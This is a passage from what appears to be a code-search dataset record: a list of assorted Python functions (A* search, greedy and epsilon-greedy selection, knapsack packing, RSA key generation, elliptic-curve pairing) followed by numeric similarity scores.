q.append(tentativeCandidate)\r\n yield q,tentativeCandidate,significant,insignificant\r\n q.pop(0) #remove it from the queue after we have created/tried all the tentativeCandidates\r\n\r\n else: # when the p-value not significant\r\n q.pop(0)\r\n insignificant.append(element)\r\n yield q,tentativeCandidate,significant,insignificant\r\n else:\r\n yield q,tentativeCandidate,significant,insignificant # grab the last values before breaking out of the while loop\r", "def qgset(x):\n return 0.2855*x - 0.8565", "def test_greedy_one_or_more():\n grammar = r\"\"\"\n S: A+ A*;\n terminals\n A: \"a\";\n \"\"\"\n\n g = Grammar.from_string(grammar)\n p = GLRParser(g)\n forest = p.parse(\"a a a a a a\")\n assert len(forest) == 6\n\n # But greedy variant has only one solution where first A+! collects all tokens.\n grammar = r\"\"\"\n S: A+! 
A*;\n terminals\n A: \"a\";\n \"\"\"\n\n g = Grammar.from_string(grammar)\n p = GLRParser(g)\n forest = p.parse(\"a a a a a a\")\n assert len(forest) == 1", "def automorphism_group_QQ_fixedpoints(rational_function, return_functions=False, iso_type=False):\n\n if rational_function.parent().is_field():\n K = rational_function.parent()\n R = K.ring()\n else:\n R = rational_function.parent()\n K = R.fraction_field()\n\n F = R.base_ring()\n\n if F != QQ and F!= ZZ:\n raise TypeError(\"coefficient ring is not the rational numbers or the integers\")\n\n z = R.gen(0)\n phi = R.fraction_field()(rational_function)\n\n f = phi.numerator()\n g = phi.denominator()\n\n #scale f,g so both have integer coefficients\n N = lcm(f.denominator(),g.denominator())\n f = f*N\n g = g*N\n N = gcd(gcd(f.coefficients()), gcd(g.coefficients()))\n f = f/N\n g = g/N\n\n d = max(f.degree(), g.degree())\n\n h = f - g*z\n\n if return_functions:\n elements = [z]\n else:\n elements = [matrix(F, 2, [1,0,0,1])]\n\n rational_roots = h.roots(multiplicities = False)\n\n min_poly = 1\n\n #check if infinity is a fixed point\n if g.degree() < d: #then infinity is a fixed point\n #find elements in W of the form (infinity, y)\n #where W is the set of F-rational points (x,y) such that\n #x is fixed by phi and phi(y)=x\n for T in g.roots(multiplicities=False):\n alpha = T\n zeta = -1\n s = (zeta*z + alpha*(1 - zeta))\n if s(phi(z)) == phi(s(z)):\n if return_functions:\n elements.append(s)\n else:\n elements.append(matrix(F, 2, [zeta, alpha*(1-zeta), 0, 1]))\n\n for S in h.roots():\n min_poly = min_poly*(z - S[0])**(S[1])\n\n if g.degree() < d: #then infinity is a fixed point so (infinity, S[0])\n alpha = S[0] # is in Z_(1,1)**2\n zeta = -1\n s = (zeta*z + alpha*(1 - zeta))\n if s(phi(z)) == phi(s(z)):\n if return_functions:\n elements.append(s)\n else:\n elements.append(matrix(F, 2, [zeta, alpha*(1-zeta), 0, 1]))\n\n #now compute points in W\n preimage = f - g*S[0]\n if preimage.degree() < d: #infinity is in W\n zeta = -1\n alpha = S[0]\n s = (zeta*z + alpha*(1 - zeta))\n if s(phi(z)) == phi(s(z)):\n if return_functions:\n elements.append(s)\n else:\n elements.append(matrix(F, 2, [zeta, alpha*(1-zeta), 0, 1]))\n for T in preimage.roots(multiplicities=False):\n if T != S[0]:\n zeta = -1\n alpha = S[0]\n beta = T\n s = ( (alpha - zeta*beta)*z - (alpha*beta)*(1 - zeta))/((1 - zeta)*z + (alpha*zeta - beta))\n if s(phi(z)) == phi(s(z)):\n if return_functions:\n elements.append(s)\n else:\n elements.append(matrix(F, 2,\n [(alpha - zeta*beta), - (alpha*beta)*(1 - zeta),\n (1 - zeta), (alpha*zeta - beta)]))\n\n #first look at rational fixed points\n #Subsets is ok since we just needed unordered pairs\n for S in Subsets(rational_roots, 2):\n zeta = -1\n alpha = S[0]\n beta = S[1]\n s = ( (alpha - zeta*beta)*z - (alpha*beta)*(1 - zeta))/((1 - zeta)*z + (alpha*zeta - beta))\n if s(phi(z)) == phi(s(z)):\n if return_functions:\n elements.append(s)\n else:\n elements.append(matrix(F, 2,\n [(alpha - zeta*beta), - (alpha*beta)*(1 - zeta),\n (1 - zeta), (alpha*zeta - beta)]))\n\n\n #now consider 2-periodic points\n psi = phi(phi(z))\n f2 = psi.numerator()\n g2 = psi.denominator()\n period2_points = [x for x in (f2 - z*g2).roots(multiplicities=False) if not x in rational_roots]\n for S in Subsets(period2_points, 2):\n zeta = -1\n alpha = S[0]\n beta = S[1]\n s = ( (alpha - zeta*beta)*z - (alpha*beta)*(1 - zeta))/((1 - zeta)*z + (alpha*zeta - beta))\n if s(phi(z)) == phi(s(z)):\n if return_functions:\n elements.append(s)\n else:\n 
elements.append(matrix(F, 2,\n [(alpha - zeta*beta), - (alpha*beta)*(1 - zeta),\n (1 - zeta), (alpha*zeta - beta)]))\n if g2.degree() < f2.degree() and g.degree() == d: #infinity has period 2\n for alpha in period2_points:\n zeta = -1\n s = (zeta*z + alpha*(1 - zeta))\n if s(phi(z)) == phi(s(z)):\n if return_functions:\n elements.append(s)\n else:\n elements.append(matrix(F, 2, [zeta, alpha*(1-zeta), 0, 1]))\n factors = (f2 - z*g2).factor()\n L1 = NumberField(z**2 + 1,'i')\n i=L1.gen(0)\n L2 = NumberField(z**2 + 3,'isqrt3')\n isqrt3 = L2.gen(0)\n for psi in factors:\n if psi[0].degree() == 2:\n a = psi[0][2]\n b = psi[0][1]\n c = psi[0][0]\n disc = b**2 - 4*a*c\n s = (-b*z - 2*c)/(2*a*z + b)\n if s(phi(z)) == phi(s(z)):\n if return_functions:\n elements.append(K(s))\n else:\n elements.append(matrix(F, 2, [-b,-2*c, 2*a, b]))\n if is_square(-disc): #psi[0] generates Q(i)\n alpha = psi[0].change_ring(L1).roots()[0][0]\n beta = alpha.trace() - alpha\n for zeta in [i, -i]:\n a = (alpha - zeta*beta)/(1 - zeta)\n d = (alpha*zeta - beta)/(1 - zeta)\n if a in F and d in F:\n a = F(a)\n d = F(d)\n b = F(-alpha*beta)\n s = ( a*z + b)/(z + d)\n if s(phi(z)) == phi(s(z)):\n if return_functions:\n elements.append(K(s))\n else:\n elements.append(matrix(F, 2, [a,b, 1, d]))\n elif is_square(-3*disc): #psi[0] generates Q(zeta_3)\n alpha = psi[0].change_ring(L2).roots()[0][0]\n beta = alpha.trace() - alpha\n for zeta in [F(1)/F(2)*(1 + isqrt3), F(1)/F(2)*(1 - isqrt3),F(1)/F(2)*(-1 + isqrt3), F(1)/F(2)*(-1 - isqrt3)]:\n a = (alpha - zeta*beta)/(1 - zeta)\n d = (alpha*zeta - beta)/(1 - zeta)\n if a in F and d in F:\n a = F(a)\n d = F(d)\n b = F(-alpha*beta)\n s = ( a*z + b)/(z + d)\n if s(phi(z)) == phi(s(z)):\n if return_functions:\n elements.append(K(s))\n else:\n elements.append(matrix(F, 2, [a,b, 1, d]))\n\n if iso_type:\n return(elements, which_group(elements))\n return(elements)", "def greedy_selector(self):\n r_k = 0 \n best_route = []\n cities_to_visit = [i for i in range(1, self.city_count)]\n for _ in range(1, self.city_count):\n s_ind = np.argmax([self.tau[(r_k, u)] for u in cities_to_visit])\n s_k = cities_to_visit.pop(s_ind)\n best_route.append((r_k, s_k))\n r_k = s_k\n best_route.append((r_k, 0))\n \n shortest_path = np.sum([self.phi[(p)] for p in best_route])\n return best_route, shortest_path", "def a_star_search(problem, heuristic=null_heuristic):\n fringe = util.PriorityQueueWithFunction(lambda x: x.get_cost() + heuristic(x.get_node(), problem))\n return general_search(problem, fringe)", "def createEpsilonGreedyPolicy(Q, epsilon, num_actions):\n\n def policyFunction(state):\n Action_probabilities = np.ones(num_actions,\n dtype=float) * epsilon / num_actions\n\n best_action = np.argmax(Q[state])\n Action_probabilities[best_action] += (1.0 - epsilon)\n return Action_probabilities\n\n return policyFunction", "def astar(grid, heuristic):\r\n evaluatedMap = {}\r\n unevaluatedMap = {}\r\n start = grid.getStart()\r\n goal = grid.getGoals()[0]\r\n startG = 0\r\n startH = heuristic(start,goal)\r\n currentNode = Node(start,startH,startG)\r\n unevaluatedMap[currentNode.coord] = currentNode\r\n \r\n while len(unevaluatedMap) > 0:\r\n # I tried using a PriorityQueue but because a node could end up with \r\n # an updated priority it really didn't make sense to use one and\r\n # instead had to just serach the dictionary each time for the smallest\r\n # priority which is the sum of g and h\r\n currentNode = min(unevaluatedMap.values(),key=lambda x:x.g + x.h)\r\n \r\n # if the current node is the goal then 
create the path by iterating backwards\r\n # and pushing the current node to the front of the path and then moving to the\r\n # parent node\r\n if currentNode.coord == goal:\r\n path = []\r\n while currentNode.parentNode:\r\n path.insert(0,currentNode.coord)\r\n currentNode = currentNode.parentNode\r\n path.insert(0,currentNode.coord)\r\n grid.setPath(path)\r\n return\r\n \r\n # Move the current node to the evaluated map and delete it from\r\n # the unevaluated map\r\n evaluatedMap[currentNode.coord] = currentNode\r\n del unevaluatedMap[currentNode.coord]\r\n \r\n # Mark the current node as having been visited\r\n grid.addVisited(currentNode.coord)\r\n \r\n # Get the neighbors of the current node\r\n neighbors = grid.getNeighbors(currentNode.coord)\r\n\r\n # For each neighbor check if that neighbor has alread been evaluated\r\n # if it has then skip that neighbor. If it hasn't and it isn't in the\r\n # unevaluated map add it with a high cost and heuristic.\r\n # Get the neighbor from the unevaluated map and calculate the current\r\n # cost. If the current cost is less than what existed update the neighbor\r\n # and add it back to the list otherwise skip to next neighbor\r\n for neighbor in neighbors:\r\n ncoord = (neighbor[0])\r\n if (ncoord) in evaluatedMap:\r\n continue\r\n if (ncoord) not in unevaluatedMap:\r\n node = Node(ncoord,float('inf'),float('inf'))\r\n unevaluatedMap[ncoord] = node\r\n \r\n node = unevaluatedMap[ncoord]\r\n calc_cost = currentNode.g + neighbor[1]\r\n if calc_cost >= node.g:\r\n continue\r\n \r\n node.parentNode = currentNode\r\n node.g = calc_cost\r\n node.h = heuristic(ncoord,goal)", "def test_greedy_zero_or_more():\n grammar = r\"\"\"\n S: A* A*;\n terminals\n A: \"a\";\n \"\"\"\n\n g = Grammar.from_string(grammar)\n p = GLRParser(g)\n forest = p.parse(\"a a a a a a\")\n assert len(forest) == 7\n\n # But greedy variant has only one solution where first A*! collects all tokens.\n grammar = r\"\"\"\n S: A*! 
A*;\n terminals\n A: \"a\";\n \"\"\"\n\n g = Grammar.from_string(grammar)\n p = GLRParser(g)\n forest = p.parse(\"a a a a a a\")\n assert len(forest) == 1", "def make_epsilon_greedy_policy(estimator, nA):\n def policy_fn(sess, observation, epsilon):\n A = np.ones(nA, dtype=float) * epsilon / nA\n q_values = estimator.predict(sess, np.expand_dims(observation, 0))[0]\n print(f'q_values: {q_values}')\n best_action = np.argmax(q_values)\n A[best_action] += (1.0 - epsilon)\n return A\n return policy_fn", "def greedy(items, maxCost, keyFunction):\n result = []\n itemsCopy = sorted(items, key=keyFunction, reverse=True)\n totalValue , totalCalories = 0.0, 0.0\n for i in range(len(itemsCopy)):\n item = itemsCopy[i]\n if (totalCalories + item.getCalories()) <= maxCost:\n result.append(item)\n totalCalories += item.getCalories()\n totalValue += item.getValue()\n return result, totalValue", "def WeilPairing(self, m, P, Q):\n O = self.infpoint\n if self.mul(m, P) != O or self.mul(m, Q) != O:\n raise ValueError(\"sorry, not mP=[0] or mQ=[0].\")\n\n if P == O or Q == O or P == Q:\n return self.basefield.one\n\n T = U = False\n forbidden = [O, P, Q, self.sub(Q, P)]\n R = self.sub(P,Q) # assume Q not in group generated P\n while (not T) or (not U):\n while R in forbidden:\n R = self.point()\n T = self.Miller(Q, m, P, R)\n# S = self.add(P, R)\n# if S == O:\n# continue\n# S = self.sub(Q, R)\n# if S == O:\n# continue\n U = self.Miller(P, m, Q, self.mul(-1, R))\n F = U/T\n return F", "def choose(self):\n\n i = bisect.bisect(self._p, random.random())\n return self._values[i]", "def a_star(initial_state, heuristic, dimension=3):\n\n\tdef add_cost(node):\n\t\tnode.cost = node.depth + heuristic(node.state)\n\n\treturn search(initial_state, Frontier(PriorityQueue), dimension, cost_fn=add_cost)", "def genKeys(p, q):\n # Fill in code to generate the server's public and private keys.\n # Make sure to use the Extended Euclidean algorithm...............................\n n = p * q\n phi = (p-1)*(q-1)\n #e = e_finder(n, phi)\n while True:\n e = random.randint(1, phi)\n if gcd_iter(e, phi) == 1:\n break\n d = ext_Euclid(phi, e)\n if d <0:\n d+=phi\n return n, e, d", "def KeqPrime(self):\n dg0_prime = self.DeltaG0Prime()\n if dg0_prime is None:\n return None\n \n rt = constants.R * constants.DEFAULT_TEMP\n keq = numpy.exp(-dg0_prime / rt)\n return keq", "def group_settings(obs_expt: ObservablesExperiment,\n method: str = 'greedy') -> ObservablesExperiment:\n allowed_methods = ['greedy', 'clique-removal']\n assert method in allowed_methods, f\"'method' should be one of {allowed_methods}.\"\n if method == 'greedy':\n return group_settings_greedy(obs_expt)\n elif method == 'clique-removal':\n return group_settings_clique_removal(obs_expt)", "def a_star_search(problem, heuristic=null_heuristic):\r\n \"*** YOUR CODE HERE ***\"\r\n fringe = util.PriorityQueue()\r\n path = set()\r\n final = []\r\n acts = dict()\r\n state = problem.get_start_state()\r\n fringe.push(state, 0)\r\n\r\n while (True):\r\n state = fringe.pop()\r\n path.add(state)\r\n states = problem.get_successors(state)\r\n acts[state] = states[:]\r\n if problem.is_goal_state(state):\r\n break\r\n\r\n states = problem.get_successors(state)\r\n # push into fringe\r\n for stat in states:\r\n if stat[0] not in path:\r\n \"\"\"\r\n it does worse in corners problems, to work better needs heavy huristic, not worth in\r\n in corners problem expandend nodes grow expo\r\n all others are better\r\n counter = 0 # in some situation it helps, in some it doesnt\r\n 
#print(stat[0].pieces)\r\n for x in stat[0].pieces[0]:\r\n if x:\r\n counter += 1\r\n \"\"\"\r\n counter = 0\r\n fringe.push(stat[0], stat[2] + counter + heuristic(stat[0], problem)) # problem.get_cost_of_actions([stat[1]])\r\n\r\n while (True):\r\n\r\n for key, val in acts.items():\r\n for va in val:\r\n if va[0] == state:\r\n final.append(va[1])\r\n state = key\r\n break\r\n else:\r\n continue\r\n break\r\n if state == problem.get_start_state():\r\n break\r\n\r\n final.reverse()\r\n\r\n return final", "def greedy_next_action(self, state):\n max_val = float('-inf')\n if self.verbose:\n cells = []\n max_candidates = {}\n for i in range(3):\n for j in range(3):\n if state[i][j] == VALUES.EMPTY:\n val = self.q_value((state, (i, j)))\n if val >= max_val:\n max_val = val\n max_move = (i, j)\n max_candidates[max_move] = val\n if self.verbose:\n cells.append('{0:.3f}'.format(val).center(6))\n elif self.verbose:\n cells.append(state[i][j].center(6))\n if self.verbose:\n self.logger.info(BOARD.format(*cells))\n possible_actions = [k for k, v in max_candidates.items() if v == max_val]\n action = random.choice(possible_actions) if len(possible_actions) > 0 else None\n return action", "def getRandom(self):\n n = len(self.keys)\n while n > 0:\n index = random.randint(0, n - 1)\n my_key = self.keys[index]\n if my_key in self.ds:\n return my_key\n else:\n self.keys[index] = self.keys[n - 1]\n self.keys.pop()\n n = n - 1\n\n\n\n\n\n # Your RandomizedSet object will be instantiated and called as such:\n # obj = RandomizedSet()\n # param_1 = obj.insert(val)\n # param_2 = obj.remove(val)\n # param_3 = obj.getRandom()", "def astar_multi(maze):\n graph_ = Graph(maze.getObjectives())\n\n pq = []\n visited = {}\n\n goals = maze.getObjectives()\n start = maze.getStart()\n\n tie = 1\n #\n # tuple = (f,g,h,x&y,tiebreaker, goals left, currpath, visited)\n # h = min_manhattan(goals, start)\n h = mst_heur(start, goals, graph_)\n\n curr = (h, 0, h, start, goals, 0, [])\n heapq.heappush(pq, curr)\n\n food = None\n while len(pq) > 0:\n curr = heapq.heappop(pq)\n # print(\"curr:\", curr)\n if curr[3] in curr[4]:\n curr[4].remove(curr[3])\n if len(curr[4]) == 0:\n # print(\"DONE\")\n # print(food)\n food = curr\n break\n neighbors = maze.getNeighbors(curr[3][0], curr[3][1])\n for n in neighbors:\n curr_goals_left = curr[4].copy()\n curr_visited = curr[6].copy()\n tie += 1\n\n # print(\"curr[6]: \", curr[6])\n # print(\"n: \", n)\n # print\n\n # h2 = min_manhattan(curr[4], n)\n h2 = mst_heur(n, curr[4], graph_)\n f2 = h2 + curr[1]\n g2 = curr[1] + 1\n\n node_new = (f2, g2, h2, n, curr_goals_left, tie, curr_visited)\n\n if node_new[3] not in visited or node_new[4] not in visited[node_new[3]][1]:\n if node_new[3] not in visited:\n visited[node_new[3]] = (node_new[3], [])\n visited[node_new[3]][1].append(node_new[4])\n node_new[6].append(curr[3])\n heapq.heappush(pq, node_new)\n\n if food is None:\n return []\n\n food[6].append(food[3])\n\n return food[6]", "def epsilon_greedy(deques: List[deque],\n model: BetaBernoulli,\n mode: str,\n topk: int = 1,\n epsilon: float = 0.1,\n **kwargs) -> Union[int, List[int]]:\n if random.random() < epsilon:\n return random_sampling(deques, topk)\n else:\n samples = model.eval\n if mode == 'max':\n ranked = np.argsort(samples)[::-1]\n elif mode == 'min':\n ranked = np.argsort(samples)\n\n if topk == 1:\n for j in range(len(deques)):\n category = ranked[j]\n if len(deques[category]) != 0:\n return category\n else:\n categories_list = []\n candidates = set([i for i in range(len(deques)) if 
len(deques[i]) > 0])\n # when we go through 'ranked' and len(categories_list) < topk, topk sampling is reduced to top 1\n if len(candidates) < topk:\n return epsilon_greedy(deques, model, mode, topk=1)\n else:\n for category in ranked:\n if category in candidates:\n categories_list.append(category)\n if len(categories_list) == topk:\n return categories_list", "def get_prob(cls, expansion, **given):\n fields = 'parent lmk rel deg'\n params = dict((f, None) for f in fields.split())\n params.update(given)\n return cls.query.filter_by(expansion=expansion, **params).one()", "def ple(self,x):\r\n for i in self.dp: # initial conditions: self.dp = [2,3]\r\n if i > x:\r\n raise StopIteration\r\n yield i\r\n \r\n for i in range(self.lkdp+2,x+1,2): # skip even no's. Future: skip 5's\r\n if not self.firstdiv(i):\r\n self.dp.append(i)\r\n self.lkdp = i\r\n if i in self.sp:\r\n self.sp.remove(i)\r\n yield i\r\n \r\n raise StopIteration\r\n\r\n self.pbe = self.ple # Alternate name for pbe (\"primes less than or equal to)\r", "def generate_greedy(lists):\n \n def greedy_step(lists, base=[]):\n \"\"\"Add a single item from the list of strings to the base list.\"\"\"\n lists_copy = lists[:]\n if base == []:\n # Start with any string\n s = lists_copy.pop()\n else:\n l = find_match(lists_copy, base)\n s = add_string(l, base)\n lists_copy.remove(l)\n return lists_copy, s\n\n # This is probably nicer if it's recursive?\n base = []\n while lists:\n lists, base = greedy_step(lists, base)\n return base", "def aStarSearch(problem, heuristic=nullHeuristic):\n \"*** YOUR CODE HERE ***\"\n from util import PriorityQueue\n pq = PriorityQueue()\n # visited = []\n mapper = {}\n costs = {}\n start = problem.getStartState()\n mapper[start] = None\n costs[start] = 0\n pq.push(start, 0)\n\n while not (pq.isEmpty()):\n # print costs\n point = pq.pop()\n if problem.isGoalState(point):\n current = point\n l = []\n while mapper[current] != None:\n tup = mapper[current]\n l.append(tup[1])\n current = tup[0]\n l.reverse()\n print l\n return l\n for child in problem.getSuccessors(point):\n if not child[0] in mapper:\n cost = costs[point] + child[2]\n if (child not in costs) or (cost < costs[child[0]]):\n costs[child[0]] = cost\n full_cost = cost + heuristic(child[0], problem)\n pq.push(child[0], full_cost)\n mapper[child[0]] = point, child[1]", "def greedy(items_list, max_cost, key_function):\n tmp_list = sorted(items_list, key=key_function, reverse=True)\n cur_cost = 0\n cur_value = 0\n result = []\n\n for item in tmp_list:\n if cur_cost + item.getCost() <= max_cost:\n result.append(item)\n cur_cost += item.getCost()\n cur_value += item.getValue()\n return result, cur_value", "def _greedy_packing(items: List[Item], cap: int,\n func: Callable) -> Tuple[Set[int], int]:\n items.sort(key=func)\n included = set()\n total_val, total_weight = 0, 0\n for item in items:\n if total_weight + item.weight > cap:\n continue\n included.add(item.idx)\n total_val += item.val\n total_weight += item.weight\n return included, total_val\n # Running time complexity: O(nlog n)", "def perc_greedy(population, percentage=80):\n \n\n #initialization\n res_arr = [2] * 10\n total_knights = 80\n\n medians = get_medians(population, percentage);\n\n while(total_knights > 0):\n \n # find \"easiest\" to acheive\n ind = medians.index(min(medians))\n\n # calculate the number of knights to assign to that castle\n assign = min(total_knights, medians[ind]-res_arr[ind] + 1)\n\n # make assignment\n res_arr[ind] += assign\n total_knights -= assign\n\n # mark that castle 
as \"done\"\n medians[ind] = 100\n \n # get the score of result inst against input population\n res_inst = CBInstance(res_arr)\n res_score = grade_inst(res_inst, population)\n \n return res_inst" ]
[ "0.5804398", "0.5722934", "0.56879693", "0.5585851", "0.55798864", "0.5474166", "0.5431628", "0.5398444", "0.52860045", "0.51859754", "0.51723653", "0.5162084", "0.5161777", "0.5136731", "0.5130759", "0.51121217", "0.5099559", "0.50086784", "0.49864772", "0.49803564", "0.49771714", "0.49726832", "0.4932498", "0.49120504", "0.48763537", "0.48694795", "0.48222482", "0.48207095", "0.48084795", "0.47904724", "0.47744092", "0.47728646", "0.4770835", "0.4737775", "0.47318137", "0.470759", "0.4687032", "0.46825713", "0.46752155", "0.46647957", "0.46578747", "0.46525273", "0.46447647", "0.46418828", "0.46287438", "0.46113095", "0.4609867", "0.46075588", "0.46019334", "0.46013656", "0.46010956", "0.45954913", "0.45888934", "0.45780218", "0.45755848", "0.45738348", "0.4570871", "0.4568562", "0.45534533", "0.45515737", "0.45513615", "0.4550352", "0.45320112", "0.45232418", "0.4508889", "0.45085317", "0.45067474", "0.45039532", "0.44985634", "0.44951418", "0.44951245", "0.44948223", "0.4494438", "0.44943237", "0.44940123", "0.4491535", "0.44906554", "0.4487562", "0.44791627", "0.4475267", "0.44711423", "0.44680732", "0.44679883", "0.4466628", "0.4457912", "0.44489077", "0.44417462", "0.44413936", "0.4441353", "0.44392067", "0.44338164", "0.44279915", "0.4427106", "0.44222927", "0.44182622", "0.44151297", "0.44084314", "0.4406886", "0.44047132", "0.43970004" ]
0.54330295
6
Return an action. >>> q = TabularQ([0,1,2,3],['b','c']) >>> q.set(0, 'b', 5) >>> q.set(0, 'c', 10) >>> q.set(1, 'b', 2) >>> eps = 0. >>> epsilon_greedy(q, 0, eps) greedy 'c' >>> epsilon_greedy(q, 1, eps) greedy 'b'
def epsilon_greedy(q, s, eps = 0.5): if random.random()<eps: return uniform_dist(q.actions).draw() else: return greedy(q,s)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def eps_greedy(Q, epsilon, num_actions):\n if np.random.uniform(0,1,1) > epsilon:\n action = np.argmax(Q)\n else:\n action = np.random.randint(low=0, high=num_actions)\n \n Q_value = Q[action]\n return action, Q_value", "def epsilon_greedy(Q, epsilon, n_actions, s, train=False):\n if train or np.random.rand() < epsilon:\n action = np.argmax(Q[s, :])\n else:\n action = np.random.randint(0, n_actions)\n return action", "def epsilon_greedy(Q, epsilon, state):\n random_number = random.random()\n if (random_number < epsilon) and (state not in critical_states):\n return env.action_space.sample()\n\n else:\n return np.argmax(Q[state])", "def eps_greedy_action(self, phi, tabu):\n\n # increase counter of actions taken\n self.a_count += 1\n\n # if within the initial buffer before learning starts, random action\n aval_actions = None\n if self.a_count < self.warmup:\n\n if len(tabu) > 0:\n # Remove tabu actions from list of available actions\n aval_actions = [a for a in self.actions if a not in tabu]\n\n action = self.random_action(aval_actions)\n return action, None\n\n elif (self.a_count == self.warmup) and self.verbose:\n print('learning starts')\n\n # evaluate Q(phi, a) for each action\n qvalues = self.Qmodel.predict(phi, batch_size=1)[0]\n\n # generate random value\n randn = np.random.uniform()\n\n # eliminate tabu values from possible actions to pick\n aval_actions = None\n if len(tabu) > 0:\n if randn < self.epsilon:\n aval_actions = [a for a in self.actions if a not in tabu]\n else:\n # Update Qs to low values to ensure they are not picked\n tabu_idx = [i for i in range(self.num_actions) if self.actions[i] in tabu]\n qvalues[tabu_idx] = -9999\n\n # eps-greedy, select random action\n if randn < self.epsilon:\n action = self.random_action(aval_actions)\n a_i = self.action_str2idx(action)\n else:\n # select best action\n a_i = np.argmax(qvalues)\n action = self.actions[a_i]\n\n # update greedy parameter and action count\n self.epsilon *= self.discount_epsilon\n self.a_count += 1\n\n return action, qvalues[a_i]", "def _greedy(self, state):\n\n node = self.mcts_head\n if self.verbose > 1:\n logger.debug(f\"Starting greedy algorithm.\")\n\n while not node.terminal:\n # Parse current state\n this_state, total_reward, terminal = self._parse_path(state, node.path)\n node.set_terminal(terminal)\n if self.verbose > 1:\n logger.debug(f\" Analyzing node {node.path}\")\n\n # Expand\n if not node.terminal and not node.children:\n actions = self._find_legal_actions(this_state)\n step_rewards = [self._parse_action(action, from_which_env=\"sim\") for action in actions]\n if self.verbose > 1:\n logger.debug(f\" Expanding: {len(actions)} legal actions\")\n node.expand(actions, step_rewards=step_rewards)\n\n # If terminal, backup reward\n if node.terminal:\n if self.verbose > 1:\n logger.debug(f\" Node is terminal\")\n if self.verbose > 1:\n logger.debug(f\" Backing up total reward {total_reward}\")\n node.give_reward(self.episode_reward + total_reward, backup=True)\n\n # Debugging -- this should not happen\n if not node.terminal and not node.children:\n logger.warning(\n f\"Unexpected lack of children! 
Path: {node.path}, children: {node.children.keys()}, legal actions: {self._find_legal_actions(this_state)}, terminal: {node.terminal}\"\n )\n node.set_terminal(True)\n\n # Greedily select next action\n if not node.terminal:\n action = node.select_greedy()\n node = node.children[action]\n\n if self.verbose > 0:\n choice = self.mcts_head.select_best(mode=\"max\")\n self._report_decision(choice, state, \"Greedy\")", "def greedy(q, s):\n # Your code here\n return argmax(q.actions,lambda a:q.get(s,a))", "def choose_epsilon_greedy(self, state: Tuple[int, ...], valid_actions: Tuple[int, ...]) -> int:\n if random.random() < self.__epsilon:\n return self.choose_uniform(valid_actions)\n return self.choose_greedy(state, valid_actions)", "def make_epsilon_greedy_policy(Q, epsilon, nA):\n\n def policy_fn(observation):\n\n # get random number\n random_number = random.uniform(0, 1)\n\n # get actions with maximum value\n greedy_actions = np.argwhere(Q[observation] == np.amax(Q[observation])).squeeze()\n if not len(greedy_actions.shape):\n greedy_actions = [greedy_actions]\n action = random.choice(greedy_actions)\n\n # if number less than epsilon, get random other actions\n if random_number <= epsilon:\n all_actions = list(range(0, nA))\n if not len(greedy_actions) == nA:\n action = random.choice(all_actions)\n\n return int(action)\n\n return policy_fn", "def make_epsilon_greedy_policy(self, Q, epsilon, nA):\n\n def policy_fn(observation,p):\n A = np.ones(nA, dtype=float) * epsilon / nA\n q=Q(observation,p)\n\n best_action = np.argmax(q)\n print(\"action called:\",self.env.action_labels[best_action])\n A[best_action] += (1.0 - epsilon)\n return A\n\n return policy_fn", "def make_epsilon_greedy_policy(Q, epsilon, nA):\n def policy_fn(observation):\n A = np.ones(nA, dtype=float) * epsilon / nA\n best_action = np.argmax(Q[observation])\n A[best_action] += (1.0 - epsilon)\n return A\n return policy_fn", "def _epsilon_greedy(self, info_state, legal_actions, epsilon):\n probs = np.zeros(self._num_actions)\n if np.random.rand() < epsilon:\n action = np.random.choice(legal_actions)\n probs[legal_actions] = 1.0 / len(legal_actions)\n else:\n info_state = np.reshape(info_state, [1, -1])\n q_values = self._session.run(\n self._q_values, feed_dict={self._info_state_ph: info_state})[0]\n legal_q_values = q_values[legal_actions]\n action = legal_actions[np.argmax(legal_q_values)]\n probs[action] = 1.0\n return action, probs", "def createEpsilonGreedyPolicy(Q, epsilon, num_actions):\n def policyFunction(state):\n\n Action_probabilities = np.ones(num_actions,\n dtype = float) * epsilon / num_actions\n\n best_action = np.argmax(Q[state])\n Action_probabilities[best_action] += (1.0 - epsilon)\n return Action_probabilities\n\n return policyFunction", "def createEpsilonGreedyPolicy(Q, epsilon, num_actions):\n\n def policyFunction(state):\n Action_probabilities = np.ones(num_actions,\n dtype=float) * epsilon / num_actions\n\n best_action = np.argmax(Q[state])\n Action_probabilities[best_action] += (1.0 - epsilon)\n return Action_probabilities\n\n return policyFunction", "def make_epsilon_greedy_policy(estimator, epsilon, nA):\n def policy_fn(observation):\n A = np.ones(nA, dtype=float) * epsilon / nA\n q_values = estimator.predict(observation)\n# print(q_values)\n best_action = np.argmax(q_values)\n A[best_action] += (1.0 - epsilon)\n return A\n return policy_fn", "def make_epsilon_greedy_policy(Q, epsilon, nA):\n def policy_fn(observation):\n if random.random() < (1 - epsilon):\n return np.argmax(Q[observation])\n else:\n 
return random.choice(np.arange(nA))\n\n return policy_fn", "def greedy(initial_state, heuristic, dimension=3):\n\n\tdef add_cost(node):\n\t\tnode.cost = heuristic(node.state)\n\n\treturn search(initial_state, Frontier(PriorityQueue), dimension, cost_fn=add_cost)", "def greedy(self) -> Action:\n return NotImplemented", "def epsilonGreedyChooser(normalAction, state, stepsDone):\n epsThreshold = EPS_END + (EPS_START - EPS_END) * math.exp(-1. * stepsDone / EPS_DECAY)\n randomSample = random.random()\n if randomSample > epsThreshold:\n action = normalAction(state).max(1)[1].view(1, 1)[0].item()\n #print(action)\n return action\n else:\n return ENVIRONMENT.action_space.sample()", "def make_epsilon_greedy_policy(action_count: int, epsilon=0.0, q: dict = None,\n estimator=None, distribute_prob=True):\n if q is None and estimator is None:\n raise ValueError('Cannot make policy: both q and estimator are none')\n\n def policy_func(observation, eps=epsilon):\n actions = np.ones(action_count, dtype=float) * eps / action_count\n if q is not None:\n q_values = q[observation]\n else:\n q_values = estimator.predict(observation)\n if distribute_prob:\n best_actions = np.argwhere(q_values == np.max(q_values)).flatten()\n for i in best_actions:\n actions[i] += (1.0 - eps) / len(best_actions)\n else:\n best_action = np.argmax(q_values)\n actions[best_action] += (1.0 - eps)\n return actions\n\n return policy_func", "def __call__(self, state, q_values):\n\n if self.policy_type == \"greedy\":\n is_greedy = True\n else:\n is_greedy = random.uniform(0, 1) > self.epsilon\n\n if is_greedy :\n # choose greedy action\n index_action = np.argmax(q_values[state])\n else:\n # get a random action\n index_action = random.randint(0,3)\n\n return actions_dict[index_action]", "def greedy_policy(self, q, s):\n\t\tresult = []\n\t\tif q is None:\n\t\t\treturn result\n\t\tmax_val = q[0]\n\t\tfor action in 